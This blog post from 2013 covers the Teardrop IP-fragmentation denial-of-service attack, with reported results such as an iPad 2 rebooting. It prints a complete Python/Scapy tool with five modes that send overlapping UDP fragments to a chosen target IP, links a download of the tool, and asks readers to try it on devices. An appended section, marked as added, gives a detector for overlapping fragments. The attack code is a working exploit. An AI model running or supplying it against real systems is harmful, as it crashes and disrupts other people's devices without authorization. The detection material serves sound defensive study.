Teardrop Attack in Scapy

Today at the MPICT con, Steve Hailey said the Teardrop attack works on mobile devices--specifically on old Android devices and Blackberries.

The attack is explained here:

http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfig-security/understanding-teardrop-attacks.html

I found an instructive Wireshark tutorial with a packet capture here:

http://ask.wireshark.org/questions/8574/wireshark-teardrop-attack-help

And I wrote my own attack tool that runs in Kali Linux. The code is below, and you can download the file here:

http://samsclass.info/123/proj10/tear

Positive Results

Success! I just got this tweet! RT @ksigler: @sambowne iPad 2 WiFi only, ios6.01 = vulnerable to payload 1, 2, 4, but not 0, 3. Causes device to automatically reboot.

Negative Results

This attack had no effect on these targets I tested:

Please Help

I am hoping someone will have a device it works on.

Steve said it freezes the screen, and you need to take the battery out to restart the phone.

If you get it working, please let me know on Twitter @sambowne or by email sbowne@ccsf.edu

Thanks!

Attack Tool Code

#!/usr/bin/env python
import sys
from scapy.all import *

total = len(sys.argv)
if total != 3:
  print "Performs teardrop attack from Kali Linux"
  print " "
  print "Usage: ./tear TARGET-IP ATTACK-CODE"
  print "   Attack Codes:"
  print "   0: small payload (36 bytes), 2 packets, offset=3x8 bytes"
  print "   1: large payload (1300 bytes), 2 packets, offset=80x8 bytes"
  print "   2: large payload (1300 bytes), 12 packets, offset=80x8 bytes"
  print "   3: large payload (1300 bytes), 2 packets, offset=3x8 bytes"
  print "   4: large payload (1300 bytes), 2 packets, offset=10x8 bytes"
  sys.exit(1)   # stop after printing usage; sys.argv[1] and [2] are not both present

target=str(sys.argv[1])
attack=sys.argv[2]

print 'Attacking target ' + target + ' with attack ' + attack

if attack == '0':
  print "Using attack 0"
  size=36
  offset=3
  load1="\x00"*size
  
  i=IP()
  i.dst=target
  i.flags="MF"
  i.proto=17
  
  size=4
  offset=18
  load2="\x00"*size

  j=IP()
  j.dst=target
  j.flags=0
  j.proto=17
  j.frag=offset
  
  send(i/load1)
  send(j/load2)

elif attack == '1':
  print "Using attack 1"
  size=1300
  offset=80
  load="A"*size
  
  i=IP()
  i.dst=target
  i.flags="MF"
  i.proto=17
  
  j=IP()
  j.dst=target
  j.flags=0 
  j.proto=17
  j.frag=offset
  
  send(i/load)
  send(j/load)

elif attack == '2':
  print "Using attack 2"
  print "Attacking with attack 2"
  size=1300
  offset=80
  load="A"*size
  
  i=IP()
  i.dst=target
  i.proto=17
  i.flags="MF"
  i.frag=0
  send(i/load)

  print "Attack 2 packet 0"
  
  for x in range(1, 10):
    i.frag=offset
    offset=offset+80
    send(i/load)
    print "Attack 2 packet " + str(x)
  
  i.frag=offset
  i.flags=0
  send(i/load)

elif attack == '3':
  print "Using attack 3"
  size=1336
  offset=3
  load1="\x00"*size
  
  i=IP()
  i.dst=target
  i.flags="MF"
  i.proto=17
  
  size=4
  offset=18
  load2="\x00"*size
  
  j=IP()
  j.dst=target
  j.flags=0
  j.proto=17
  j.frag=offset
  
  send(i/load1)
  send(j/load2)

else:         # attack == 4
  print "Using attack 4"
  size=1300
  offset=10
  load="A"*size
  
  i=IP()
  i.dst=target
  i.flags="MF"
  i.proto=17
  
  j=IP()
  j.dst=target
  j.flags=0
  j.proto=17
  j.frag=offset
  
  send(i/load)
  send(j/load)

print "Done!"
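
On the receiving side, the overlap these fragments depend on is visible in the IP header alone. The following is an added example, not part of the original tool: it parses raw IPv4 headers (Python 3, standard library only) and flags fragments of one datagram whose byte ranges overlap. The sample packets are constructed from the payload sizes and offsets in the usage text for attack codes 0 and 1; the addresses, IP IDs and function names are assumptions.

```python
import struct
from collections import defaultdict

def parse_fragment(packet):
    """Return (flow key, first data byte, byte past last data byte, MF flag) for a raw IPv4 packet."""
    (ver_ihl, _tos, total_len, ident, flags_frag,
     _ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    header_len = (ver_ihl & 0x0F) * 4
    start = (flags_frag & 0x1FFF) * 8        # offset field counts 8-byte units
    end = start + total_len - header_len
    more = bool(flags_frag & 0x2000)         # MF (more fragments) bit
    return (src, dst, proto, ident), start, end, more

def find_overlaps(packets):
    """Return (flow key, earlier range, later range) for every pair of overlapping fragments."""
    seen = defaultdict(list)
    findings = []
    for packet in packets:
        key, start, end, more = parse_fragment(packet)
        if start == 0 and not more:
            continue                         # unfragmented datagram
        for s, e in seen[key]:
            if start < e and s < end:        # byte ranges intersect
                findings.append((key, (s, e), (start, end)))
        seen[key].append((start, end))
    return findings

def make_fragment(ident, frag_units, more, payload_len):
    """Build a constructed IPv4 fragment (documentation addresses, checksum left 0)."""
    flags_frag = (0x2000 if more else 0) | frag_units
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident, flags_frag,
                         64, 17, 0, bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))
    return header + b"\x00" * payload_len

# Constructed sample traffic: two overlapping pairs and one normal fragmented datagram.
SAMPLE = [
    make_fragment(1, 0, True, 36),   make_fragment(1, 3, False, 4),      # 36 bytes, then offset 3x8
    make_fragment(2, 0, True, 1300), make_fragment(2, 80, False, 1300),  # 1300 bytes, then offset 80x8
    make_fragment(3, 0, True, 1480), make_fragment(3, 185, False, 520),  # contiguous, no overlap
]

if __name__ == "__main__":
    for key, first, second in find_overlaps(SAMPLE):
        print("overlap in datagram id %d: bytes %s and %s" % (key[3], first, second))
```

A reassembler or IDS rule built on the same comparison can drop or alert on the datagram as soon as the second range intersects the first.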


Posted 2:21 PM 6-20-13 by Sam Bowne
Updated 3:18 PM with iPad 2 results & reformatted
More negative results added 6:23 pm 6-20-13